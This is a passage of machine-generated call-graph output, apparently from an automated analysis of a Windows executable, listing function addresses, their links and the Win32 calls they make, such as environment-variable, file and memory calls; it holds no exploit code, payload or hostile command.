16761 a766c9 16760->16761 16762 a75e70 20 API calls 16761->16762 16763 a766d8 16762->16763 16764 a75e70 20 API calls 16763->16764 16765 a766e7 16764->16765 16766 a75e70 20 API calls 16765->16766 16771 a766f6 16766->16771 16767 a767ed GetCommandLineW 16773 a738f0 16767->16773 16768 a7673a SHGetSpecialFolderPathW 16769 a7675a wsprintfW 16768->16769 16768->16771 16770 a736c0 13 API calls 16769->16770 16770->16771 16771->16767 16771->16768 16772 a736c0 13 API calls 16771->16772 16772->16771 16774 a7394b 16773->16774 16776 a738fe 16773->16776 16775 a73936 16774->16775 16777 a71c50 4 API calls 16774->16777 16779 a71d50 16775->16779 16776->16775 16778 a71c50 4 API calls 16776->16778 16777->16774 16778->16776 17346 a89300 16779->17346 16782 a74320 16783 a710d0 _Error_objects ??2@YAPAXI 16782->16783 16784 a7432e codecvt 16783->16784 16785 a74465 16784->16785 16789 a71c50 memcpy _CxxThrowException ??2@YAPAXI ??3@YAXPAX 16784->16789 16792 a710d0 _Error_objects ??2@YAPAXI 16784->16792 16794 a72370 _DebugHeapAllocator 3 API calls 16784->16794 16795 a84cd0 ??3@YAXPAX codecvt 16784->16795 17353 a74480 16784->17353 17356 a739a0 16784->17356 17367 a894b0 16784->17367 16786 a72370 _DebugHeapAllocator 3 API calls 16785->16786 16787 a74471 16786->16787 16788 a84cd0 codecvt ??3@YAXPAX 16787->16788 16790 a74479 16788->16790 16789->16784 16790->16432 16792->16784 16794->16784 16795->16784 16798 a76d04 16797->16798 16799 a76d5a lstrlenW lstrlenW 16798->16799 16800 a76d82 16798->16800 17388 a75ae0 16799->17388 16800->16435 16800->16436 16803 a72c60 _DebugHeapAllocator 2 API calls 16802->16803 16804 a735c5 codecvt 16803->16804 17400 a73a50 16804->17400 16807 a735f5 codecvt 16808 a84cd0 codecvt ??3@YAXPAX 16807->16808 16809 a73600 GetModuleFileNameW 16808->16809 16809->16441 16809->16442 17407 a893a0 16810->17407 16814 a75e82 16813->16814 16815 a75ebe 16814->16815 16816 a75ec8 GetLastError wsprintfW GetEnvironmentVariableW GetLastError 16814->16816 16834 a89450 16815->16834 16817 a75f06 ??2@YAPAXI GetEnvironmentVariableW 16816->16817 16818 a75fff SetLastError 16816->16818 16820 a75fe7 ??3@YAXPAX 16817->16820 16821 a75f52 GetLastError 16817->16821 16818->16815 16819 a76029 16818->16819 16823 a76047 16819->16823 16824 a76063 lstrlenA ??2@YAPAXI 16819->16824 16820->16818 16821->16820 16822 a75f60 16821->16822 16827 a75fd4 16822->16827 16828 a75f6f lstrcmpiW 16822->16828 17414 a75e00 16823->17414 16825 a760b3 GetLocaleInfoW 16824->16825 16826 a760f2 MultiByteToWideChar 16824->16826 16825->16826 16830 a760dd _wtol 16825->16830 16826->16815 16827->16818 16831 a75fbc ??3@YAXPAX 16828->16831 16832 a75f8a ??3@YAXPAX 16828->16832 16830->16826 16831->16827 16832->16827 16835 a89462 _DebugHeapAllocator 16834->16835 16836 a890a0 4 API calls 16835->16836 16837 a89474 16836->16837 17419 a81470 memcpy 16837->17419 16839 a89493 16839->16501 17420 a76180 GetProcAddress 16840->17420 16845 a711cf 16843->16845 16844 a71209 16844->16476 16844->16477 16845->16844 17423 a86de0 16845->17423 17460 a88c40 ??2@YAPAXI 16849->17460 16851 a73b1f 16852 a78790 16851->16852 16853 a787a1 codecvt 16852->16853 16854 a787e8 16853->16854 17461 a765d0 16853->17461 16854->16484 16857 a73b10 ??2@YAPAXI 16856->16857 16858 a761fe 16857->16858 16876 a86de0 3 API calls 16858->16876 16859 a76214 17471 a73e20 16859->17471 16861 a7622b 16862 a76235 16861->16862 16866 a76255 codecvt 16861->16866 16863 a7b300 51 API calls 16862->16863 16864 a7623e 16863->16864 16865 a84cd0 codecvt ??3@YAXPAX 16864->16865 16873 a76250 16865->16873 16867 a7628d 16866->16867 17483 a74510 16866->17483 16868 a7629f 16867->16868 17546 a762c0 16867->17546 16871 a84cd0 codecvt ??3@YAXPAX 16868->16871 16871->16873 16873->16498 16873->16499 16874 a76279 16875 a84cd0 codecvt ??3@YAXPAX 16874->16875 16875->16873 16876->16859 16878 a71d50 _DebugHeapAllocator 3 API calls 16877->16878 16879 a78557 16878->16879 16880 a89450 4 API calls 16879->16880 16881 a77a14 16880->16881 16882 a71760 16881->16882 16885 a71770 16882->16885 16883 a717cc 16883->16527 16883->16528 16884 a716e0 78 API calls 16884->16885 16885->16883 16885->16884 16886 a73880 lstrlenW lstrlenW _wcsnicmp 16885->16886 16887 a71a8b _wtol 16885->16887 17633 a71520 16885->17633 16886->16885 16887->16885 16890 a74c00 lstrcmpW 16889->16890 16891 a76dd2 16890->16891 16892 a71d50 _DebugHeapAllocator 3 API calls 16891->16892 16901 a76e01 codecvt 16891->16901 16894 a76dec 16892->16894 16893 a74c00 lstrcmpW 16895 a76e25 16893->16895 16896 a75e70 20 API calls 16894->16896 16898 a74c00 lstrcmpW 16895->16898 16897 a76df3 16896->16897 16900 a89450 4 API calls 16897->16900 16899 a76e46 16898->16899 16902 a74c00 lstrcmpW 16899->16902 16900->16901 16901->16893 16903 a76e66 16902->16903 16904 a76e72 lstrcmpiW 16903->16904 16905 a76e85 16903->16905 16904->16905 16906 a74c00 lstrcmpW 16905->16906 16907 a76e9b 16906->16907 16908 a74c00 lstrcmpW 16907->16908 16909 a76ed8 16908->16909 16912 a76eed 16909->16912 17679 a76a40 16909->17679 16911 a74c00 lstrcmpW 16911->16912 16912->16911 16915 a76f28 16912->16915 17683 a769c0 16912->17683 16914 a74c00 lstrcmpW 16914->16915 16915->16914 16916 a76f60 16915->16916 17687 a76a00 16915->17687 16917 a74c00 lstrcmpW 16916->16917 16919 a76f6c 16917->16919 16920 a74c00 lstrcmpW 16919->16920 16921 a76f80 16920->16921 16922 a74c00 lstrcmpW 16921->16922 16923 a76f94 16922->16923 16924 a76fb2 16923->16924 16925 a76fa0 _wtol 16923->16925 16926 a74c00 lstrcmpW 16924->16926 16925->16924 16927 a76fbe 16926->16927 16928 a76fdc 16927->16928 16929 a76fca _wtol 16927->16929 16930 a74c00 lstrcmpW 16928->16930 16929->16928 16931 a76fe8 16930->16931 16932 a74c00 lstrcmpW 16931->16932 16933 a77009 16932->16933 16934 a74c00 lstrcmpW 16933->16934 16935 a77029 16934->16935 16936 a71230 16935->16936 16937 a71241 codecvt 16936->16937 16938 a71245 16937->16938 16941 a86de0 3 API calls 16937->16941 16938->16571 16939 a7126d codecvt 17695 a7ffb0 16939->17695 16941->16939 16943 a741e0 lstrcmpW 16942->16943 16944 a74c11 codecvt 16943->16944 16944->16571 18944 a89270 16945->18944 16949 a73740 ??2@YAPAXI 16948->16949 16950 a736ce 16949->16950 16951 a71d50 _DebugHeapAllocator 3 API calls 16950->16951 16952 a736da 16951->16952 16953 a71d50 _DebugHeapAllocator 3 API calls 16952->16953 16954 a736e6 16953->16954 18952 a76500 ??2@YAPAXI 16954->18952 16957 a73732 16958 a73770 codecvt ??3@YAXPAX 16957->16958 16960 a7373a 16958->16960 16959 a716a0 _DebugHeapAllocator 2 API calls 16961 a73707 16959->16961 16960->16571 16962 a89450 4 API calls 16961->16962 16963 a73713 codecvt 16962->16963 16964 a736c0 13 API calls 16963->16964 16965 a73727 16964->16965 16966 a84cd0 codecvt ??3@YAXPAX 16965->16966 16966->16957 18963 a804f0 ??3@YAXPAX 16967->18963 16969 a84cdf 16969->16571 16974 a7688f codecvt 16970->16974 16971 a768fc 16971->16557 16972 a72c60 _DebugHeapAllocator 2 API calls 16972->16974 16974->16971 16974->16972 16975 a768eb SetEnvironmentVariableW 16974->16975 18964 a76850 16974->18964 16976 a84cd0 codecvt ??3@YAXPAX 16975->16976 16976->16974 16978 a73d90 12 API calls 16977->16978 16979 a7680c 16978->16979 19056 a75930 16979->19056 19682 a77410 17051->19682 17054 a75e70 20 API calls 17055 a77335 17054->17055 17056 a716a0 _DebugHeapAllocator 2 API calls 17055->17056 17058 a77344 17056->17058 17057 a773a4 17059 a89450 4 API calls 17057->17059 17058->17057 17060 a89450 4 API calls 17058->17060 19685 a89510 17058->19685 17062 a773b6 17059->17062 17060->17058 17063 a89450 4 API calls 17062->17063 17064 a773c6 codecvt 17063->17064 17065 a797f0 18 API calls 17064->17065 17066 a773e7 17065->17066 17067 a84cd0 codecvt ??3@YAXPAX 17066->17067 17068 a773f2 17067->17068 17069 a78460 codecvt ??3@YAXPAX 17068->17069 17070 a773fd 17069->17070 17070->16443 17072 a75e70 20 API calls 17071->17072 17073 a7b312 wvsprintfW 17072->17073 17074 a7b476 17073->17074 17075 a7b33d GetLastError FormatMessageW 17073->17075 17076 a7b260 20 API calls 17074->17076 17077 a7b376 FormatMessageW 17075->17077 17078 a7b3a1 lstrlenW lstrlenW ??2@YAPAXI lstrcpyW lstrcpyW 17075->17078 17079 a7768c 17076->17079 17077->17074 17077->17078 19692 a7b260 17078->19692 17079->16450 17083 a76abe 17082->17083 17084 a73350 2 API calls 17083->17084 17085 a76acc 17084->17085 17086 a76b6e 17085->17086 17088 a716a0 _DebugHeapAllocator 2 API calls 17085->17088 17087 a73b10 ??2@YAPAXI 17086->17087 17089 a76b76 17087->17089 17090 a76ae3 17088->17090 19706 a76c20 17089->19706 17094 a76af8 17090->17094 17098 a76b14 codecvt 17090->17098 17096 a84cd0 codecvt ??3@YAXPAX 17094->17096 17095 a76b90 17100 a88e20 4 API calls 17095->17100 17097 a76b04 17096->17097 19703 a734b0 17097->19703 17101 a74c30 81 API calls 17098->17101 17102 a76ba1 17100->17102 17103 a76b2e 17101->17103 17104 a88e20 4 API calls 17102->17104 17105 a76b4a 17103->17105 17107 a73350 2 API calls 17103->17107 17106 a76bae codecvt 17104->17106 17108 a84cd0 codecvt ??3@YAXPAX 17105->17108 19713 a87000 17106->19713 17109 a76b43 17107->17109 17110 a76b56 17108->17110 17109->17105 17111 a76b66 17109->17111 17112 a734b0 Concurrency::details::VirtualProcessorRoot::~VirtualProcessorRoot CloseHandle 17110->17112 17113 a84cd0 codecvt ??3@YAXPAX 17111->17113 17114 a76b0c 17112->17114 17113->17086 17114->16514 17114->16524 17116 a76bcd codecvt 17117 a76bde 17116->17117 17120 a76bf7 17116->17120 17118 a84cd0 codecvt ??3@YAXPAX 17117->17118 17119 a76bea 17118->17119 17121 a734b0 Concurrency::details::VirtualProcessorRoot::~VirtualProcessorRoot CloseHandle 17119->17121 17122 a84cd0 codecvt ??3@YAXPAX 17120->17122 17121->17114 17123 a76c03 17122->17123 17124 a734b0 Concurrency::details::VirtualProcessorRoot::~VirtualProcessorRoot CloseHandle 17123->17124 17124->17114 17126 a77490 Concurrency::IVirtualProcessorRoot::IVirtualProcessorRoot 3 API calls 17125->17126 17127 a77b5f 17126->17127 17128 a797f0 17127->17128 17129 a797ff 17128->17129 17141 a77b78 17128->17141 17130 a716a0 _DebugHeapAllocator 2 API calls 17129->17130 17129->17141 17131 a79815 17130->17131 17132 a716a0 _DebugHeapAllocator 2 API calls 17131->17132 17133 a79821 17132->17133 17134 a76850 18 API calls 17133->17134 17135 a7982a 17134->17135 17136 a76850 18 API calls 17135->17136 17137 a79836 codecvt 17136->17137 17138 a84cd0 codecvt ??3@YAXPAX 17137->17138 17139 a7987a 17138->17139 17140 a84cd0 codecvt ??3@YAXPAX 17139->17140 17140->17141 17142 a78460 17141->17142 17143 a7b1e0 codecvt ??3@YAXPAX 17142->17143 17144 a77b8d 17143->17144 17144->16580 17345->16753 17347 a89312 _DebugHeapAllocator 17346->17347 17348 a89370 17347->17348 17349 a89323 ??2@YAPAXI ??3@YAXPAX 17347->17349 17352 a81470 memcpy 17348->17352 17349->17348 17351 a71d63 17351->16782 17352->17351 17372 a88c90 17353->17372 17357 a710d0 _Error_objects ??2@YAPAXI 17356->17357 17360 a739ae codecvt 17357->17360 17358 a72c60 _DebugHeapAllocator 2 API calls 17359 a73a14 17358->17359 17361 a84cd0 codecvt ??3@YAXPAX 17359->17361 17363 a735b0 7 API calls 17360->17363 17366 a73a08 17360->17366 17362 a73a1c 17361->17362 17362->16784 17364 a739da codecvt 17363->17364 17365 a739ec MultiByteToWideChar 17364->17365 17365->17366 17366->17358 17376 a890a0 17367->17376 17371 a894ea 17371->16784 17375 a88b40 ??2@YAPAXI 17372->17375 17374 a74494 17374->16784 17375->17374 17377 a890c0 17376->17377 17378 a890c2 17376->17378 17380 a81470 memcpy 17377->17380 17381 a88eb0 17378->17381 17380->17371 17382 a88ecd _CxxThrowException 17381->17382 17383 a88ec4 17381->17383 17384 a88ee2 ??2@YAPAXI 17382->17384 17383->17382 17383->17384 17387 a81470 memcpy 17384->17387 17386 a88f23 ??3@YAXPAX 17386->17377 17387->17386 17389 a75aee 17388->17389 17390 a75ba0 CharUpperW 17389->17390 17391 a75b4f 17389->17391 17395 a75b75 17389->17395 17390->17389 17396 a75ba0 17391->17396 17394 a75ba0 CharUpperW 17394->17395 17395->16800 17397 a75bb2 17396->17397 17398 a75b5f 17396->17398 17397->17398 17399 a75bd3 CharUpperW 17397->17399 17398->17394 17399->17398 17401 a73a62 17400->17401 17402 a735e3 wcsncpy 17400->17402 17404 a88f60 17401->17404 17402->16807 17405 a88f72 _CxxThrowException 17404->17405 17406 a88f87 ??2@YAPAXI ??3@YAXPAX 17404->17406 17405->17406 17406->17402 17408 a893b9 17407->17408 17409 a72383 17407->17409 17410 a8941a 17408->17410 17411 a893cd ??2@YAPAXI ??3@YAXPAX 17408->17411 17409->16463 17413 a81470 memcpy 17410->17413 17411->17410 17413->17409 17415 a75e2c 17414->17415 17416 a75e0e GetUserDefaultUILanguage 17414->17416 17415->16824 17416->17415 17417 a75e35 GetSystemDefaultUILanguage 17416->17417 17417->17415 17418 a75e46 GetSystemDefaultLCID 17417->17418 17418->17415 17419->16839 17421 a761a0 GetNativeSystemInfo 17420->17421 17422 a761ad 17420->17422 17421->17422 17422->16469 17424 a711fb 17423->17424 17425 a86df3 17423->17425 17429 a71370 17424->17429 17432 a867b0 17425->17432 17427 a86e0e 17437 a86da0 17427->17437 17442 a868d0 17429->17442 17440 a97950 17432->17440 17435 a867f1 GetLastError 17436 a867fb 17435->17436 17436->17427 17438 a86db0 GetLastError 17437->17438 17439 a86dac _HRESULT_FROM_WIN32 17437->17439 17438->17439 17439->17424 17441 a867c7 SetFilePointer 17440->17441 17441->17435 17441->17436 17445 a868a0 17442->17445 17448 a86860 17445->17448 17451 a866c0 17448->17451 17456 a86710 17451->17456 17454 a866da CreateFileW 17455 a71386 17454->17455 17455->16844 17457 a866cf 17456->17457 17458 a86723 CloseHandle 17456->17458 17457->17454 17457->17455 17459 a86733 17458->17459 17459->17457 17460->16851 17466 a73770 17461->17466 17464 a765e7 ??3@YAXPAX 17465 a765f3 17464->17465 17465->16853 17467 a84cd0 codecvt ??3@YAXPAX 17466->17467 17468 a73782 17467->17468 17469 a84cd0 codecvt ??3@YAXPAX 17468->17469 17470 a7378a 17469->17470 17470->17464 17470->17465 17472 a73e2d 17471->17472 17481 a86de0 3 API calls 17472->17481 17473 a73e43 17474 a73e4b lstrlenA lstrlenA 17473->17474 17476 a73e85 17474->17476 17475 a73ea1 codecvt 17475->16861 17476->17475 17477 a74028 memmove 17476->17477 17478 a73fcb memcmp 17476->17478 17479 a73f49 memcmp 17476->17479 17549 a86d10 17476->17549 17554 a740a0 17476->17554 17477->17476 17478->17476 17479->17475 17479->17476 17481->17473 17484 a73b10 ??2@YAPAXI 17483->17484 17544 a74525 codecvt 17484->17544 17485 a74549 17486 a84cd0 codecvt ??3@YAXPAX 17485->17486 17487 a745d1 17486->17487 17487->16867 17487->16874 17490 a72370 memcpy ??2@YAPAXI ??3@YAXPAX _DebugHeapAllocator 17490->17544 17491 a745a9 17587 a74100 17491->17587 17494 a73770 codecvt ??3@YAXPAX 17496 a745c9 17494->17496 17495 a745f9 17497 a74100 57 API calls 17495->17497 17498 a84cd0 codecvt ??3@YAXPAX 17496->17498 17499 a7460b 17497->17499 17498->17487 17501 a73770 codecvt ??3@YAXPAX 17499->17501 17500 a7463d 17503 a74100 57 API calls 17500->17503 17502 a74619 17501->17502 17504 a84cd0 codecvt ??3@YAXPAX 17502->17504 17505 a7464f 17503->17505 17504->17487 17507 a73770 codecvt ??3@YAXPAX 17505->17507 17506 a7468d 17508 a74100 57 API calls 17506->17508 17509 a7465d 17507->17509 17510 a7469f 17508->17510 17511 a84cd0 codecvt ??3@YAXPAX 17509->17511 17512 a73770 codecvt ??3@YAXPAX 17510->17512 17511->17487 17513 a746ad 17512->17513 17514 a84cd0 codecvt ??3@YAXPAX 17513->17514 17514->17487 17515 a7470c 17516 a74100 57 API calls 17515->17516 17518 a7471e 17516->17518 17517 a739a0 9 API calls 17517->17544 17521 a73770 codecvt ??3@YAXPAX 17518->17521 17520 a74767 17522 a74100 57 API calls 17520->17522 17523 a7472c 17521->17523 17525 a74779 17522->17525 17526 a84cd0 codecvt ??3@YAXPAX 17523->17526 17524 a73770 ??3@YAXPAX codecvt 17524->17544 17528 a73770 codecvt ??3@YAXPAX 17525->17528 17526->17487 17527 a84cd0 ??3@YAXPAX codecvt 17527->17544 17529 a74787 17528->17529 17532 a84cd0 codecvt ??3@YAXPAX 17529->17532 17530 a74320 15 API calls 17530->17544 17531 a740a0 _CxxThrowException ??2@YAPAXI memcpy ??3@YAXPAX 17531->17544 17532->17487 17533 a748a7 lstrcmpW 17533->17544 17534 a748ff lstrlenW 17534->17544 17535 a748c0 17537 a74100 57 API calls 17535->17537 17536 a76500 6 API calls 17536->17544 17539 a748d2 17537->17539 17538 a7491a wcsncmp 17538->17544 17540 a73770 codecvt ??3@YAXPAX 17539->17540 17542 a748e0 17540->17542 17543 a84cd0 codecvt ??3@YAXPAX 17542->17543 17543->17487 17544->17485 17544->17490 17544->17491 17544->17495 17544->17500 17544->17506 17544->17515 17544->17517 17544->17520 17544->17524 17544->17527 17544->17530 17544->17531 17544->17533 17544->17534 17544->17535 17544->17536 17544->17538 17545 a71d50 _DebugHeapAllocator 3 API calls 17544->17545 17571 a73740 17544->17571 17576 a74a40 17544->17576 17603 a744a0 17544->17603 17608 a741e0 17544->17608 17545->17544 17629 a88d90 17546->17629 17548 a762d3 17548->16868 17558 a86940 17549->17558 17552 a86d4a GetLastError 17553 a86d46 _HRESULT_FROM_WIN32 17552->17553 17553->17476 17555 a740b7 17554->17555 17556 a740bf 17554->17556 17564 a88b90 17555->17564 17556->17476 17559 a86952 17558->17559 17562 a868f0 ReadFile 17559->17562 17561 a8696f 17561->17552 17561->17553 17563 a86920 17562->17563 17563->17561 17567 a88a30 17564->17567 17566 a88bce 17566->17556 17568 a88a4d _CxxThrowException 17567->17568 17569 a88a44 17567->17569 17570 a88a62 ??2@YAPAXI memcpy ??3@YAXPAX 17568->17570 17569->17568 17569->17570 17570->17566 17572 a710d0 _Error_objects ??2@YAPAXI 17571->17572 17573 a7374f 17572->17573 17574 a710d0 _Error_objects ??2@YAPAXI 17573->17574 17575 a7375a 17574->17575 17575->17544 17577 a73b10 ??2@YAPAXI 17576->17577 17580 a74a4e 17577->17580 17578 a74ac2 17579 a84cd0 codecvt ??3@YAXPAX 17578->17579 17586 a74aae 17579->17586 17580->17578 17581 a74a9a 17580->17581 17584 a740a0 4 API calls 17580->17584 17612 a73bb0 17581->17612 17584->17580 17585 a84cd0 codecvt ??3@YAXPAX 17585->17586 17586->17544 17588 a73b10 ??2@YAPAXI 17587->17588 17601 a7410e 17588->17601 17589 a74174 17590 a739a0 9 API calls 17589->17590 17591 a74186 17590->17591 17592 a741ae codecvt 17591->17592 17593 a74191 codecvt 17591->17593 17594 a7b300 51 API calls 17592->17594 17595 a7b300 51 API calls 17593->17595 17596 a741a9 17594->17596 17595->17596 17597 a84cd0 codecvt ??3@YAXPAX 17596->17597 17599 a741cf 17597->17599 17598 a740a0 4 API calls 17598->17601 17600 a84cd0 codecvt ??3@YAXPAX 17599->17600 17602 a741d7 17600->17602 17601->17589 17601->17598 17602->17494 17604 a744ad codecvt 17603->17604 17605 a74502 17604->17605 17606 a744de lstrcmpW 17604->17606 17619 a76550 17604->17619 17605->17544 17606->17604 17609 a741ec codecvt 17608->17609 17610 a7423c lstrcmpW 17609->17610 17611 a74247 17609->17611 17610->17609 17610->17611 17611->17544 17615 a88cc0 17612->17615 17614 a73bc3 17614->17585 17618 a88b40 ??2@YAPAXI 17615->17618 17617 a88cd6 _DebugHeapAllocator 17617->17614 17618->17617 17620 a76565 codecvt 17619->17620 17621 a76580 17620->17621 17622 a765d0 codecvt 2 API calls 17620->17622 17625 a76600 17621->17625 17622->17621 17628 a76630 memmove 17625->17628 17627 a76598 17627->17604 17628->17627 17630 a88da1 _DebugHeapAllocator 17629->17630 17631 a88da6 17629->17631 17630->17548 17631->17630 17632 a88dba ??2@YAPAXI ??3@YAXPAX 17631->17632 17632->17630 17634 a7152d 17633->17634 17635 a71662 17634->17635 17636 a71539 lstrlenW 17634->17636 17638 a7157f 17634->17638 17635->16885 17637 a75ae0 CharUpperW 17636->17637 17637->17634 17639 a716a0 _DebugHeapAllocator 2 API calls 17638->17639 17640 a7158b codecvt 17639->17640 17653 a73a80 17640->17653 17643 a74510 71 API calls 17644 a71641 17643->17644 17645 a71667 17644->17645 17646 a7164b 17644->17646 17648 a84cd0 codecvt ??3@YAXPAX 17645->17648 17647 a84cd0 codecvt ??3@YAXPAX 17646->17647 17649 a7165a 17647->17649 17650 a7167b 17648->17650 17651 a84cd0 codecvt ??3@YAXPAX 17649->17651 17652 a84cd0 codecvt ??3@YAXPAX 17650->17652 17651->17635 17652->17635 17654 a73b10 ??2@YAPAXI 17653->17654 17656 a73a8e codecvt 17654->17656 17655 a73aef 17657 a73bb0 _DebugHeapAllocator ??2@YAPAXI 17655->17657 17656->17655 17664 a73b30 17656->17664 17658 a73afb 17657->17658 17660 a84cd0 codecvt ??3@YAXPAX 17658->17660 17661 a71633 17660->17661 17661->17643 17662 a73ac1 codecvt 17663 a73ad3 WideCharToMultiByte 17662->17663 17663->17655 17665 a73bb0 _DebugHeapAllocator ??2@YAPAXI 17664->17665 17666 a73b45 codecvt 17665->17666 17672 a73bd0 17666->17672 17669 a73b75 codecvt 17670 a84cd0 codecvt ??3@YAXPAX 17669->17670 17671 a73b80 17670->17671 17671->17662 17673 a73be2 17672->17673 17674 a73b63 strncpy 17672->17674 17676 a88ad0 17673->17676 17674->17669 17677 a88ae2 _CxxThrowException 17676->17677 17678 a88af7 ??2@YAPAXI ??3@YAXPAX 17676->17678 17677->17678 17678->17674 17680 a76a5f 17679->17680 17691 a76900 17680->17691 17684 a769cc 17683->17684 17685 a76900 _wtol 17684->17685 17686 a769fa 17685->17686 17686->16912 17688 a76a0e 17687->17688 17689 a76900 _wtol 17688->17689 17690 a76a31 17689->17690 17690->16915 17694 a76904 17691->17694 17692 a76930 _wtol 17692->17694 17693 a769ad 17693->16912 17694->17692 17694->17693 17696 a7ffea 17695->17696 17715 a80fc0 17696->17715 17698 a80024 17699 a8005d 17698->17699 17700 a80033 17698->17700 17721 a83c50 17699->17721 17726 a80190 17700->17726 17714 a80052 17714->16938 17716 a80fe2 17715->17716 17719 a81006 _Error_objects 17716->17719 17720 a86de0 3 API calls 17716->17720 17717 a81029 17717->17719 17734 a80c60 17717->17734 17719->17698 17720->17717 17768 a83810 17721->17768 17727 a734f0 codecvt 11 API calls 17726->17727 17728 a8004a 17727->17728 17729 a734f0 17728->17729 17730 a73511 17729->17730 17731 a734ff 17729->17731 17730->17714 18851 a7ca20 17731->18851 18855 a94a60 17731->18855 17754 a8a930 17734->17754 17736 a80c7b 17742 a80c87 17736->17742 17757 a84240 17736->17757 17738 a80ce3 codecvt 17739 a80cf4 memcpy 17738->17739 17747 a80d0b codecvt 17739->17747 17740 a80d55 17760 a804f0 ??3@YAXPAX 17740->17760 17742->17719 17743 a80d9e 17761 a804f0 ??3@YAXPAX 17743->17761 17745 a80dba 17762 a804f0 ??3@YAXPAX 17745->17762 17747->17740 17747->17743 17747->17745 17748 a80e8f memcpy 17747->17748 17749 a80f20 memmove 17747->17749 17752 a86d10 2 API calls 17747->17752 17753 a86de0 3 API calls 17748->17753 17749->17747 17750 a80ee4 17763 a804f0 ??3@YAXPAX 17750->17763 17752->17747 17753->17750 17764 a8a890 17754->17764 17758 a84258 ??2@YAPAXI 17757->17758 17759 a8426f 17757->17759 17758->17759 17759->17738 17760->17742 17761->17742 17762->17742 17763->17742 17766 a8a8a7 17764->17766 17765 a8a913 17765->17736 17766->17765 17767 a86d10 2 API calls 17766->17767 17767->17766 17815 a80230 17768->17815 17946 a802f0 17815->17946 17817 a80285 17953 a804c0 ??3@YAXPAX 17817->17953 17955 a80390 17946->17955 17952 a8031b 17952->17817 17976 a804c0 ??3@YAXPAX 17955->17976 17957 a803ab 17977 a804c0 ??3@YAXPAX 17957->17977 17959 a803cb 17978 a804c0 ??3@YAXPAX 17959->17978 17961 a803d6 17979 a804c0 ??3@YAXPAX 17961->17979 17963 a803e1 17980 a804c0 ??3@YAXPAX 17963->17980 17965 a803ec 17981 a804c0 ??3@YAXPAX 17965->17981 17967 a803f7 17982 a804c0 ??3@YAXPAX 17967->17982 17969 a80402 17970 a80480 ??3@YAXPAX 17969->17970 17971 a802ff 17970->17971 17972 a80480 17971->17972 17973 a8030d 17972->17973 17974 a80491 ??3@YAXPAX 17972->17974 17975 a804c0 ??3@YAXPAX 17973->17975 17974->17973 17975->17952 17976->17957 17977->17959 17978->17961 17979->17963 17980->17965 17981->17967 17982->17969 18852 a7ca49 18851->18852 18853 a7ca41 18851->18853 18852->18853 18859 a7cab0 18852->18859 18853->17730 18856 a94a89 18855->18856 18857 a94a81 18855->18857 18856->18857 18926 a94ac0 18856->18926 18857->17730 18864 a7cae0 18859->18864 18862 a7cac7 ??3@YAXPAX 18871 a7db30 18864->18871 18872 a7db41 codecvt 18871->18872 18873 a7db88 18872->18873 18890 a7dce0 18872->18890 18895 a804f0 ??3@YAXPAX 18873->18895 18875 a7caf2 18877 a7dac0 18875->18877 18878 a7dad1 codecvt 18877->18878 18879 a7db18 18878->18879 18911 a7dcb0 18878->18911 18916 a804f0 ??3@YAXPAX 18879->18916 18881 a7cafd 18883 a7cb10 18881->18883 18924 a804f0 ??3@YAXPAX 18883->18924 18885 a7cb22 18925 a804f0 ??3@YAXPAX 18885->18925 18887 a7cb2d 18888 a7cb40 codecvt ??3@YAXPAX 18887->18888 18889 a7cabf 18888->18889 18889->18862 18896 a7dd10 18890->18896 18895->18875 18897 a8adb0 codecvt GetLastError CloseHandle WaitForSingleObject SetEvent 18896->18897 18898 a7dd28 18897->18898 18899 a7da30 codecvt 11 API calls 18898->18899 18900 a7dd33 18899->18900 18901 a7da30 codecvt 11 API calls 18900->18901 18902 a7dd3e 18901->18902 18903 a804f0 codecvt ??3@YAXPAX 18902->18903 18904 a7dd49 18903->18904 18905 a804f0 codecvt ??3@YAXPAX 18904->18905 18906 a7dd54 18905->18906 18907 a7dd70 codecvt GetLastError CloseHandle WaitForSingleObject SetEvent 18906->18907 18908 a7dd5c 18907->18908 18909 a7ddf0 codecvt 11 API calls 18908->18909 18917 a7ded0 18911->18917 18914 a7dcc7 ??3@YAXPAX 18915 a7dcd3 18914->18915 18915->18878 18916->18881 18918 a7df00 codecvt GetLastError CloseHandle 18917->18918 18919 a7dee2 18918->18919 18920 a7df00 codecvt GetLastError CloseHandle 18919->18920 18921 a7deed 18920->18921 18922 a7df00 codecvt GetLastError CloseHandle 18921->18922 18923 a7dcbf 18922->18923 18923->18914 18923->18915 18924->18885 18925->18887 18931 a94950 18926->18931 18929 a94ae3 18929->18857 18930 a94ad7 ??3@YAXPAX 18930->18929 18938 a84810 18931->18938 18934 a953d0 codecvt VirtualFree 18935 a9498a 18934->18935 18941 a949a0 18935->18941 18939 a84819 18938->18939 18940 a8481b VirtualFree 18938->18940 18939->18934 18940->18939 18942 a95090 codecvt VirtualFree 18941->18942 18943 a94998 18942->18943 18943->18929 18943->18930 18945 a89282 _DebugHeapAllocator 18944->18945 18950 a88ff0 ??2@YAPAXI 18945->18950 18947 a89294 18951 a81470 memcpy 18947->18951 18949 a716b3 18949->16571 18950->18947 18951->18949 18953 a76528 18952->18953 18954 a7651c 18952->18954 18956 a85ca0 3 API calls 18953->18956 18958 a765a0 18954->18958 18957 a736f4 18956->18957 18957->16957 18957->16959 18959 a72c60 _DebugHeapAllocator 2 API calls 18958->18959 18960 a765b3 18959->18960 18961 a72c60 _DebugHeapAllocator 2 API calls 18960->18961 18962 a765c5 18961->18962 18962->18953 18963->16969 18971 a73d90 18964->18971 18972 a710d0 _Error_objects ??2@YAPAXI 18971->18972 18973 a73d9e 18972->18973 18974 a735b0 7 API calls 18973->18974 18975 a73daa codecvt 18974->18975 18976 a73db3 ExpandEnvironmentStringsW 18975->18976 18977 a73dc3 18976->18977 18978 a73dcd 18976->18978 18979 a84cd0 codecvt ??3@YAXPAX 18977->18979 18980 a735b0 7 API calls 18978->18980 18981 a73dcb 18979->18981 18982 a73de3 codecvt 18980->18982 18988 a75870 18981->18988 18983 a73dec ExpandEnvironmentStringsW 18982->18983 18984 a73dfb 18983->18984 18985 a72370 _DebugHeapAllocator 3 API calls 18984->18985 18986 a73e07 18985->18986 18987 a84cd0 codecvt ??3@YAXPAX 18986->18987 18987->18981 18989 a710d0 _Error_objects ??2@YAPAXI 18988->18989 18990 a7587e 18989->18990 18991 a72370 _DebugHeapAllocator 3 API calls 18990->18991 18992 a7588a 18991->18992 18993 a89450 4 API calls 18992->18993 18994 a75897 18993->18994 18995 a89270 _DebugHeapAllocator 2 API calls 18994->18995 18996 a758a4 18995->18996 19019 a89730 18996->19019 19000 a758bc 19001 a72370 _DebugHeapAllocator 3 API calls 19000->19001 19002 